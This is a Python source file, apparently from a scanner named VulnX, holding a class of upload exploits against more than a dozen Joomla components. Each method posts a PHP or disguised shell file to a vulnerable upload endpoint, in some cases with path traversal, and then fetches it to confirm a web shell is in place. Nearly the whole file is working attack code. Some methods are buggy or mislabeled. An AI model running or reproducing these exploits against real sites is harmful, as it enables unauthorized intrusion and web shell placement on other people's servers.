import re
import random
import datetime
import requests
now = datetime.datetime.now()
year = now.strftime('%Y')
month= now.strftime('%m')

import os
from common.colors import failexploit , vulnexploit , que , info , good ,run,W

class JOOExploits(object):

    def __init__(self, url, headers):
        self.url = url
        self.headers = headers

    def com_jce(self):
        self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
        endpoint = self.url+"/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"
        data = {
                'upload-dir':'./../../',
                'upload-overwrite':0,
                'Filedata' : [open('shell/VulnX.gif','rb')],
                'action':'Upload',
        }
        requests.post(endpoint, data=data, headers=self.headers,verify=False).text
        dump_data = self.url + "/VulnX.gif"
        res=requests.get(dump_data, self.headers).text
        matches = re.findall(re.compile(r'/image/gif/'),res)
        if matches:
            return dict(
                url=self.url,
                name="com_jce",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="com_jce",
                status=False
            )

    def com_media(self):
        self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
        endpoint = self.url+"/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder="
        self.headers={"content-type":["form-data"]}
        fieldname = 'Filedata[]'
        shell = open('shell/VulnX.txt','rb')
        data = {
                fieldname:shell,
        }
        requests.post(endpoint, data=data, headers=self.headers,verify=False).text
        dump_data = endpoint+"/images/XAttacker.txt"
        response = requests.get(dump_data,self.headers,verify=False).text
        if re.findall(r'Tig', response):
            return dict(
                url=self.url,
                name="com_media",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="com_media",
                status=False
            )


    #def com_jdownloads(self):
    #    endpoint = self.url+"index.php?option=com_jdownloads&Itemid=0&view=upload"
    #    files = open('shell/VulnX.zip','rb')
    #    shell = open('shell/VulnX.gif','rb')
    #    data = {
    #        'name' : 'Tig',
    #        'mail' :'tig@tig.com', 
    #        'filetitle' :'Tig',
    #        'catlist':'1',
    #        'license':'0',
    #        'language':'0',
    #        'system':'0',
    #        'file_upload': files,
    #        'pic_upload':shell,
    #        'description':'<p>zot</p>',
    #        'senden':'Send file',
    #        'option':'com_jdownloads',
    #        'view':'upload',
    #        'send':'1', 
    #        '24c22896d6fe6977b731543b3e44c22f':'1',
    #    }
    #    requests.post(endpoint, options, self.headers).text
    #    dump_data = endpoint+"/images/jdownloads/screenshots/VulnX.gif?Vuln=X"
    #    response = requests.get(dump_data).text
    #    if re.findall(r'Vuln X', response):
    #        print (' %s com_jdownloads        %s    %s' %(que,vulnexploit,dump_data))
    #    else: 
    #        print (' %s com_jdownloads        %s' %(que , failexploit))

    #def com_jdownloadsb(self):
    #    self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    #    endpoint = self.url+"/images/jdownloads/screenshots/VulnX.php"
    #    self.headers={"content-type":["form-data"]}
    #    files = open('shell/VulnX.zip','rb')
    #    shell = open('shell/VulnX.gif','rb')
    #    data = {
    #        'name' : 'Tig',
    #        'mail' :'tig@tig.com', 
    #        'filetitle' :'Tig',
    #        'catlist':'1',
    #        'license':'0',
    #        'language':'0',
    #        'system':'0',
    #        'file_upload': files,
    #        'pic_upload':shell,
    #        'description':'<p>zot</p>',
    #        'senden':'Send file',
    #        'option':'com_jdownloads',
    #        'view':'upload',
    #        'send':'1', 
    #        '24c22896d6fe6977b731543b3e44c22f':'1'
    #    }
    #    response = requests.get(endpoint,self.headers).text
    #    if re.findall(r'200', response):
    #        print (' %s com_jdownloads2        %s    %s' %(que,vulnexploit,endpoint))
    #    else: 
    #        print (' %s com_jdownloads2        %s' %(que , failexploit))

    def com_fabrika(self):
        self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
        endpoint = self.url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"

        self.headers={"content-type":["form-data"]}
        fieldname = 'file'
        shell = open('shell/VulnX.php','rb')
        data = {
                fieldname:shell,
        }
        requests.post(endpoint, data=data, headers=self.headers).text
        dump_data = endpoint+"/images/XAttacker.txt"
        response = requests.get(dump_data,self.headers,verify=False).text
        if re.findall(r'Vuln X', response):
            return dict(
                url=self.url,
                name="com_fabrika",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="com_fabrika",
                status=False
            )

    def com_fabrikb(self):
        self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
        endpoint = self.url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"

        self.headers={"content-type":["form-data"]}
        fieldname = 'file'
        shell = open('shell/VulnX.txt','rb')
        data = {
                fieldname:shell,
        }
        requests.post(endpoint, data=data, headers=self.headers,verify=False).text
        dump_data = endpoint+"/images/XAttacker.txt"
        response = requests.get(dump_data,self.headers,verify=False).text
        if re.findall(r'Tig', response):
            return dict(
                url=self.url,
                name="com_fabrik2",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="com_fabrik2",
                status=False
            )

    def com_foxcontact(self):
        self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    #    foxf = {'components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php',
    #            'index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php',
    #            'index.php?option=com_foxcontact&amp;view=loader&amp;type=uploader&amp;owner=module&amp;id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php',
    #            'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'}
        endpoint = self.url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"

        self.headers={"content-type":["form-data"]}
        fieldname = 'file'
        shell = open('shell/VulnX.txt','rb')
        data = {
                fieldname:shell,
        }
        requests.post(endpoint, data=data, headers=self.headers,verify=False).text
        dump_data = endpoint+"/images/XAttacker.txt"
        response = requests.get(dump_data,self.headers).text
        if re.findall(r'Tig', response):
            return dict(
                url=self.url,
                name="com_foxcontact",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="com_foxcontact",
                status=False
            )

    def com_adsmanager(self):
        endpoint = self.url + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.html')
        files= {'image': (name_img,img,'form-data',{'Expires': '0'}) }
        requests.post(endpoint,files=files ,headers=self.headers,verify=False)
        shellup = self.url + "/tmp/plupload/VulnX.html"
        checkShell = requests.get(shellup).text
        statusCheck = re.findall(re.compile(r'VulnX'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="com_adsmanager",
                status=True,
                shell=shellup
            )
        else:
            return dict(
                url=self.url,
                name="com_adsmanager",
                status=False
            )

    def com_blog(self):
        endpoint = self.url + "/index.php?option=com_myblog&task=ajaxupload"
        checkShell = requests.get(endpoint,headers=self.headers,verify=False).text
        statusCheck = re.findall(re.compile(r'has been uploaded'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="com_blog",
                status=True,
                shell=''
            )
        else:
            return dict(
                url=self.url,
                name="com_blog",
                status=False
            )

    def com_users(self):
        endpoint = self.url + "/index.php?option=com_users&view=registration"
        checkShell = requests.get(endpoint,headers=self.headers,verify=False).text
        statusCheck = re.findall(re.compile(r'jform_email2-lbl'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="com_users",
                status=True,
                shell=''
            )
        else:
            return dict(
                url=self.url,
                name="com_users",
                status=False
            )

    def comweblinks(self):
        endpoint = self.url + "/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author="
        token = re.findall(re.compile(r'<form action=\"(.*?)" id="uploadForm\"'),endpoint)
        if token:
            self.url = token.group(1)
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.gif')
        fieldname = "image[]"
        files= {'image': (name_img,img,'form-data',{'Expires': '0'})}
        data = { fieldname : files }
        requests.post(endpoint, data=data, headers=self.headers,verify=False).text
        shellup = self.url + "/images/VulnX.gif"
        checkShell = requests.get(shellup)
        if checkShell.status_code == 200:
            return dict(
                url=self.url,
                name="comweblinks",
                status=True,
                shell=shellup
            )
        else:
            return dict(
                url=self.url,
                name="comweblinks",
                status=False
            )

    def mod_simplefileupload(self):
        endpoint = self.url + "/modules/mod_simplefileuploadv1.3/elements/udd.php"
        img = open('shell/VulnX.php.mp4', 'rb')
        name_img= os.path.basename('shell/VulnX.php.mp4')
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        requests.post(endpoint, files=files, headers=self.headers,verify=False)
        shellup = self.url + "/modules/mod_simplefileuploadv1.3/elements/VulnX.php?Vuln=X"
        checkShell = requests.get(shellup).text
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="mod_simplefileupload",
                status=True,
                shell=shellup
            )
        else:
            return dict(
                url=self.url,
                name="mod_simplefileupload",
                status=False
            )

    def com_jbcatalog(self):
        endpoint = self.url + "/components/com_jbcatalog/libraries/jsupload/server/php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        fieldname = "image[]"
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        data = { fieldname : files }
        requests.post(endpoint, data=data, headers=self.headers,verify=False).text
        shellup = self.url + "/components/com_jbcatalog/libraries/jsupload/server/php/files/VulnX.php?Vuln=X"
        checkShell = requests.get(shellup).text
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="com_jbcatalog",
                status=True,
                shell=shellup
            )
        else:
            return dict(
                url=self.url,
                name="com_jbcatalog",
                status=False
            )

    def com_sexycontactform(self):
        endpoint = self.url + "/com_sexycontactform/fileupload/index.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        fieldname = "image[]"
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        data = { fieldname : files }
        requests.post(endpoint, data=data, heades=self.headers,verify=False).text
        shellup = self.url + "/com_sexycontactform/fileupload/files/files/VulnX.php?Vuln=X"
        checkShell = requests.get(shellup,headers=self.headers,verify=False).text
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="com_sexycontactform",
                status=True,
                shell=shellup
            )
        else:
            return dict(
                url=self.url,
                name="com_sexycontactform",
                status=False
            )

    def com_rokdownloads(self):
        endpoint = self.url + "/administrator/components/com_rokdownloads/assets/uploadhandler.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        fieldname = "Filedata"
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        data = { fieldname : files,
                'jpath' : '..%2F..%2F..%2F..%2F',
                }
        requests.post(endpoint, data=data, headers=self.headers,verify=False).text
        shellup = self.url + "/images/stories/VulnX.php?Vuln=X"
        checkShell = requests.get(shellup,headers=self.headers,verify=False).text
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="com_rokdownloads",
                status=True,
                shell=shellup
            )
        else:
            return dict(
                url=self.url,
                name="com_rokdownloads",
                status=False
            )

    def com_extplorer(self):
        endpoint = self.url + "/administrator/components/com_extplorer/uploadhandler.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        fieldname = "Filedata"
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        data = { fieldname : files }
        requests.post(endpoint, data, headers=self.headers,verify=False).text
        shellup = self.url + "/images/stories/VulnX.php?Vuln=X"
        checkShell = requests.get(shellup,headers=self.headers,verify=False).text
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="com_extplorer",
                status=True,
                shell=shellup
            )
        else:
            return dict(
                url=self.url,
                name="com_extplorer",
                status=False
            )

    def com_jwallpapers(self):
        endpoint = self.url + "/index.php?option=com_jwallpapers&task=upload"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        fieldname = "Filedata"
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        data = { fieldname : files ,
                'submit' : 'Upload',
                }
        requests.post(endpoint, data, headers=self.headers,verify=False).text
        shellup = self.url + "/jwallpapers_files/plupload/VulnX.php?Vuln=X"
        checkShell = requests.get(shellup,headers=self.headers,verify=False).text
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="com_jwallpapers",
                status=True,
                shell=shellup
            )
        else:
            return dict(
                url=self.url,
                name="com_jwallpapers",
                status=False
            )

    def com_facileforms(self):
        endpoint = self.url + "/components/com_facileforms/libraries/jquery/uploadify.php"
        img = open('shell/VulnX.php', 'rb')
        name_img= os.path.basename('shell/VulnX.php')
        fieldname = "Filedata"
        files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
        data = { fieldname : files ,
                'folder' : '/components/com_facileforms/libraries/jquery/',
                }
        requests.post(endpoint, data, headers=self.headers,verify=False).text
        shellup = self.url + "/components/com_facileforms/libraries/jquery/VulnX.php?Vuln=X"
        checkShell = requests.get(shellup,headers=self.headers,verify=False).text
        statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
        if statusCheck:
            return dict(
                url=self.url,
                name="com_facileforms",
                status=True,
                shell=shellup
            )
        else:
            return dict(
                url=self.url,
                name="com_facileforms",
                status=False
            )

    def exploit_state(self,exploit):
        if (exploit['status']):
            print(' {0} {1} {2} {3}'.format(que,exploit['name'],vulnexploit,exploit['dump_data']))
        else:
            print(' {0} {1} \t {2}'.format(que,exploit['name'],failexploit))

    def jooexploits(self):
        print ("{0} −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−".format(W))
        print(' {0} Exploits Scan'.format(run))
        self.exploit_state(self.com_jce())
        self.exploit_state(self.com_media())
        self.exploit_state(self.com_fabrika())
        self.exploit_state(self.com_fabrikb())
        self.exploit_state(self.com_foxcontact())
        self.exploit_state(self.com_adsmanager())
        self.exploit_state(self.com_blog())
        self.exploit_state(self.com_users())
        self.exploit_state(self.comweblinks())
        self.exploit_state(self.mod_simplefileupload())
        self.exploit_state(self.com_jbcatalog())
        self.exploit_state(self.com_sexycontactform())
        self.exploit_state(self.com_rokdownloads())
        self.exploit_state(self.com_extplorer())
        self.exploit_state(self.com_jwallpapers())
        self.exploit_state(self.com_facileforms())
        print ("{0} −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−".format(W))